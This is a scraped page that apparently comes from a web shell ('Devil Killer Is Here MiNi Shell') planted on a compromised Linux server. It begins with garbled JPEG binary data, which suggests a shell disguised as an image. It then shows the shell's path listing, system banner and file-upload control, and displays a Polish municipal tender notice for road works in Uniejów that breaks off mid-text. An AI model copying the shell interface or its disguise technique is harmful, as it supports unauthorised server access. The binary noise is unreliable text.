JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220511/0015301401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa dostępności komunikacyjnej i bezpieczeństwa w Gminie Uniejów poprzez modernizację infrastruktury drogowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Uniejów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 311019579</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Błogosławionego Bogumiła 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Uniejów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-210</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@uniejow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://uniejow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa dostępności komunikacyjnej i bezpieczeństwa w Gminie Uniejów poprzez modernizację infrastruktury drogowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-13790bcf-d04a-11ec-9ed6-82024ae9c4d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00153014</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00039860/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.13 poprawa dostępności komunikacyjnej i bezpieczeństwa w Gminie Uniejów poprzez modernizację infrastruktury drogowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gminauniejow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gminauniejow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert, dokumentów, oświadczeń, wniosków, zawiadomień, zapytań oraz przekazywanie informacji odbywa się za przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy znajdującej się pod adresem: https://gminauniejow.ezamawiajacy.pl w zakładce „Korespondencja”. W sytuacjach awaryjnych, np. w przypadku niedziałania platformy Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej (e-mail: urzad@uniejow.pl lub ze służbowej poczty elektronicznej pracowników Urzędu Miasta w Uniejowie z rozszerzeniem @uniejow.pl ) z zastrzeżeniem, iż złożenie oferty może odbyć się wyłącznie za pomocą powyższej Platformy.4. Ogólne zasady korzystania z Platformy:<br/>-	a) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie gminy Uniejów; https://gminauniejow.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl<br/>-	b) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>-	c) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej <br/>-	d) Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu<br/>Zamawiający wskazuje minimalne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>-	a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>-	b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>-	c) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>-	d)Włączona obsługa JavaScript;<br/>-	e) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>-	Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Uniejów, z siedzibą ul. Błogosławionego Bogumiła 13, 99 – 210 Uniejów, telefon 63 288 97 40, fax 63 288 97 43; 63 288 97 40 wew. 43, adres e-mail: urzad@uniejow.pl;<br/>2) inspektorem ochrony danych osobowych w Gminie Uniejów jest Pan Andrzej Olszak, kontakt: adres e-mail:daneosobowe@uniejow.pl, telefon 888-259-832;<br/>Przetwarzanie danych osobowych jest zgodne z prawem i spełnia warunki, o których mowa w art. 6 ust. 1 lit. b RODO.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 7 lat od dnia zakończenia postępowania o udzielenie zamówienia<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.6.2022 AB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Poprawa dostępności komunikacyjnej i bezpieczeństwa w Gminie Uniejów poprzez modernizację infrastruktury drogowej.” –modernizacja drogi w Uniejowie oraz dróg w Spycimierzu. <br/><br/>3.1	Zakres zamówienia części I obejmuje przebudowę: <br/><br/>3.1.1	Remont drogi gminnej i wewnętrznej w m. Spycimierz o długości 762,20m w formule „Zaprojektuj i wybuduj” na podstawie dołączonego Programu Funkcjonalno –Użytkowego<br/>3.1.1.1 Zakres dla poniższego ciągu drogowego obejmuje:<br/>a) Opracowanie dokumentacji projektowej na remont drogi na podstawie dołączonego do postępowania programu funkcjonalno-użytkowego. w tym projektu budowlanego, projektu wykonawczego, STWiORB, przedmiaru robót, kosztorysu inwestorskiego wraz z uzyskaniem uzgodnień, opinii, decyzji administracyjnych niezbędnych do przystąpienia, do realizacji zadania oraz wykonanie robót budowlanych zgodnie z SWZ, opracowanym projektem budowlanym i projektem wykonawczym, STWiORB, zasadami wiedzy technicznej i obowiązującymi w Rzeczypospolitej Polskiej przepisami prawa Uzyskanie niezbędnych opinii, wymaganych prawem decyzji, uzgodnień i zezwoleń oraz przygotowanie materiałów do złożenia wniosku w celu uzyskania decyzji pozwolenie na budowę/zgłoszenie wykonania robót przez Wykonawcę oraz uzyskaniu innych decyzji administracyjnych niezbędnych do zrealizowania zadania inwestycyjnego <br/>b)Wykonanie robót budowlanych wraz z niezbędną infrastrukturą towarzyszącą <br/>w oparciu o dokumentację projektową wykonaną przez projektanta polegających <br/>na przebudowie drogi w niżej wymienionym zakresie:<br/>•	korekta przebiegu drogi w istniejących granicach pasa drogowego,<br/>•	wykonanie obustronnych poboczy,<br/>•	wykonanie warstwy wyrównawczej z masy bitumicznej na odcinku od 0+000 – 0+162<br/>•	wykonanie warstwy ścieralnej KR-3 z masy bitumicznej,<br/>•	wykonanie oznakowania pionowego.<br/><br/>3.1.1.2 Zakres robót budowlanych obejmuje wykonanie: <br/>- warstwy wyrównawczej 75 kg/m2, na odcinku od 0+000 – 0+162<br/>- Warstwy ścieralna AC 11 S 4 cm KR3 na odcinku od 0+000 – 0+762,20 <br/>- obustronnych poboczy do szerokości 0,75 m z kruszywa kamiennego <br/>-wykonanie oznakowania pionowego.<br/><br/>3.1.2 Drogi wewnętrznej w m. Uniejów (za wałem i dalej przy zbiorniku) o dł. Ok. 2,0 km na podstawie dołączonej dokumentacji projektowej. <br/><br/>Inwestycja będzie realizowana na działkach o numerach ewidencyjnych 2146/38, 2146/42, 2146/43, 2146/50, obręb 1 miasto Uniejów, gmina Uniejów.<br/><br/>3.1.2.1 Zakres prac obejmuje wykonanie kolejnego etapu robót budowlanych tj:<br/>Na odcinku drogi o przebiegu między wałem a rzeką Wartą o długości 950 m górnej warstwy podbudowy z kruszywa łamanego grubości 10cm po zagęszczeniu <br/>Na odcinku długości 700m między wałem a zagrodą młynarską wykonanie warstwy wyrównawczej z kruszywa oraz nawierzchni z betonu asfaltowego. <br/><br/>3.1.2.2 Zakres robót zgodny z dołączonymi przedmiarami.<br/><br/>3.1.3 Drogi wewnętrznej w m. Spycimierz na działkach o numerach ewidencyjnych 310, 2 obręb Spycimierz, o długości około 0.310 km na podstawie dołączonej dokumentacji projektowej. <br/><br/>3.1.3.1 Zakres robót obejmuje między innymi: <br/>•	wykonanie robót przygotowawczych i rozbiórkowych, <br/>•	wykonanie koryta wraz z profilowaniem i zagęszczeniem istniejącego podłoża pod warstwy konstrukcyjne, <br/>•	wykonanie warstwy podbudowy z gruntu stabilizowanego cementem oraz z kruszywa łamanego, <br/>•	wykonanie nawierzchni <br/>•	wykonanie nawierzchni poboczy i zjazdów z kruszywa kamiennego, <br/>•	regulacja wysokościowa urządzeń, <br/>•	wykonanie robót wykończeniowych. <br/><br/>Uwaga: Zmiana w stosunku do dokumentacji projektowej i przedmiarów – wykonanie nawierzchni z betonu asfaltowego ( warstwa wiążąca gr 4 cm, warstwa ścieralna 4cm wraz z wcześniejszym skropieniem warstw) zamiast kostki betonowej gr. 8cm <br/><br/>3.1.3.2 Zakres robót obejmuje odcinek A od km 0+065 do 0+374,35. Obszar, na którym zostanie zrealizowana inwestycja objęty jest miejscowym planem zagospodarowania przestrzennego dla strefy uzdrowiskowej „C” na terenie miejscowości Spycimierz w gminie Uniejów.<br/><br/>3.1.3.3 Inwestycja zlokalizowana jest na stanowisku archeologicznym Spycimierz oraz w obszarze historycznego układu przestrzennego miasta Spycimierz ujętego w wojewódzkiej ewidencji zabytków AZP pod numerem 65-45/177, będącego pozostałością osady miejskiej i miasta datowanego na XIV – XX wiek, w związku powyższym wykonawca przedmiotu zamówienia zobowiązany jest do przeprowadzenia wykopaliskowych badań archeologicznych wyprzedzających wszelkiego rodzaju prace ziemne. O pozwolenie na przeprowadzenie badań należy wystąpić do Wojewódzkiego Urzędu Ochrony Zabytków w Łodzi. <br/><br/>3.1.4 Ciągu pieszo-rowerowego wzdłuż drogi gminnej nr 111152E łączącej m. Zieleń z m. Spycimierz na działkach o numerach ewidencyjnych 372, 1052, obręb Spycimierz, oraz częściowo na działce nr ewid. 102, obręb Zieleń na podstawie dołączonej dokumentacji projektowej <br/><br/>3.1.4.1Zakres robót obejmuje między innymi: <br/>•	Budowę ciągu pieszo – rowerowego wzdłuż krawędzi jezdni drogi gminnej, <br/>•	budowę chodnika, <br/>•	Budowę poboczy, <br/>•	Wykonanie oznakowania pionowego i poziomego, <br/>•	Wycinkę istniejących drzew, <br/> ( zakres robót nie obejmuje wykonania oświetlenia i kanału technologicznego) <br/> <br/>3.1.4.2 Inwestycja zlokalizowana jest częściowo na stanowiskach archeologicznych ujętych w ewidencji AZP pod numerem 62-45/75, które są pozostałością osady wczesnośredniowiecznej i osady nowożytnej a także pod numerem 62-45/177 będące pozostałością osady/miasta datowanego na XIV – XX wiek. W związku z powyższym wykonawca przedmiotu zamówienia zobowiązany jest do przeprowadzenia wykopaliskowych badań archeologicznych wyprzedzających wzmiankowaną inwestycję oraz przeprowadzenia badań archeologicznych w postaci nadzoru. O pozwolenie na prowadzenie badań należy Wystąpić do Wojewódzkiego Urzędu Ochrony Zabytków w Łodzi. Wykonawca zobowiązany jest zapewnić kierowanie badaniami archeologicznymi przez osobę posiadającą niezbędne kwalifikacje oraz wykonania ewentualnych innych obowiązków wynikających z pozyskanej decyzji Łódzkiego Wojewódzkiego Konserwatora Zabytków. <br/><br/>3.1.4.3 Zakres robót przewiduje następujące zmiany w stosunku do dokumentacji projektowej- zamiast krawężników zastosować obrzeża zgodnie z przedmiarem robót, zamiast dwóch warstw nawierzchni asfaltowej – jedna warstwa nawierzchni asfaltowej- zgodnie z przedmiarem robót </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233223-8 - Wymiana nawierzchni drogowej</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie podlegają nie odrzucone oferty według następujących kryteriów:<br/>a) Cena - 60 %<br/>b) Okres gwarancji na który Wykonawca przedłuża okres rękojmi za wady – 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na który Wykonawca przedłuża okres rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II „Poprawa dostępności komunikacyjnej i bezpieczeństwa w Gminie Uniejów poprzez modernizację infrastruktury drogowej.” –modernizacja dróg w Czepowie, Górach i Wilamowie.<br/>4.1. Zakres zamówienia części II obejmuje przebudowę: <br/>4.1.1 Drogi gminnej nr 111174E Wilamów – Kol. Wilamów na działce oznaczonej w ewidencji gruntów numerem 521 obręb Wilamów na odcinku o długości ok. 0,999m wykonanie robót budowalnych w formule „ Zaprojektuj i wybuduj” na podstawie Programu Funkcjonalno- Użytkowego<br/>4.1.1.1 Zakres zamówienia obejmuje :<br/>Opracowanie dokumentacji 